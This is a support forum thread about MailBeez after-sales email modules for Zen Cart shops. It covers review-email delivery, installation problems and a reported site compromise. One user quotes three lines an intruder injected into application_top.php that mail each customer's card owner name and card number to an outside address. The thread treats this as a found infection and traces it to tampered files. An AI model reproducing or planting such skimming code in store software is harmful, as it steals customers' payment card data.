Mailbeez After Sales Modules

hi, im having trouble sending simple review emails, it seems they are going to my email address when i set it to run (i set as the send copies email address to mine which is fine), however customer ones are only going to copy@localhost am i missing something?

another question if i may the emails that came through to me are obviously the ones which will be sent to the customer, firstly only a text version was sent and secondly the text $review_link showed instead of the link, any ideas?

Ok, so I uploaded mailbeeze, and I so happen get hacked not long after.

On my security software I find the exploit as following:

/home/XXXXX/public_html/includes/application_top.php:232: $title = $country123." - ".$ccowner123."-".$ccnumber123;
/home/XXXXX/public_html/includes/application_top.php:233: mail("[email protected]",$title,$message123);
/home/XXXXX/public_html/includes/application_top.php:234: }

Looking further into it, by installing mailbeez, it was copying every ordering going through our system through the APPLICATION_TOP.PHP and sending it in an email back to the mailbeez admin.

Any explanation why your software would need copies of my customers orders?

that code is not part of mailbeez! mailbeez does not send any data!

where did you download mailbeez from? are you sure that this issue was inserted by mailbeez?

It seems as if the mailbeez files were manipulated on or shortly after upload. I'll have my original post removed/edited as soon as I can to prevent any worry for others. Your files were targeted on my hack attempt for whatever reason.

I would like to make sure that mailbeez is not opening any security issues - so hope we can find the root of this situation.

We also need to know which version of ZC Sjolie is running. Versions prior to 139h have security issues.

1. When I upload the winback advanced files to /Mailhive/Mailbeez and then click on the "modules" tab the page is completely white, with links to sections. (see attached image). Remove the winback advanced files and it's back to normal.

2. After installing the template manager, I am only able to edit the default theme. If I preview the layout in review advanced configuration there is is still a link for upgrading to template manager...

3. Review advanced auto logon is not working. I sent a test email to an email address that has an account in my card and when I click to review an item I'm directed to the login page, however when entering email/pw I am not logged in, just returned to the login prompt. If I close my browser and then open it and browse to my cart, I am logged in.

I have read other posts that reference a debug log, but I'm not sure where to find it...

Circling back on this for the benefit of others :) Don't install modules when you are tired :blush: I re-ran the install carefully following the instructions and my white page problem went away. The other 2 or non-issues.

You can always find new release MailBeez modules using the Version-Check Button on the Dashboard.

any specific questions? the module allowz to define the number of emails sent per hour and after how many emails to stopmthe sendings. it comes with a simple drop in installation.

Ya, I think many will upgrade. Those who have not yet upgraded (like me) are simply waiting for all the best mods to be compatible first.

Folks are chomping at the bit to see all the most popular/favorite mods updated so they can move ahead with zc1.5, as it is much more secure than all previous versions.
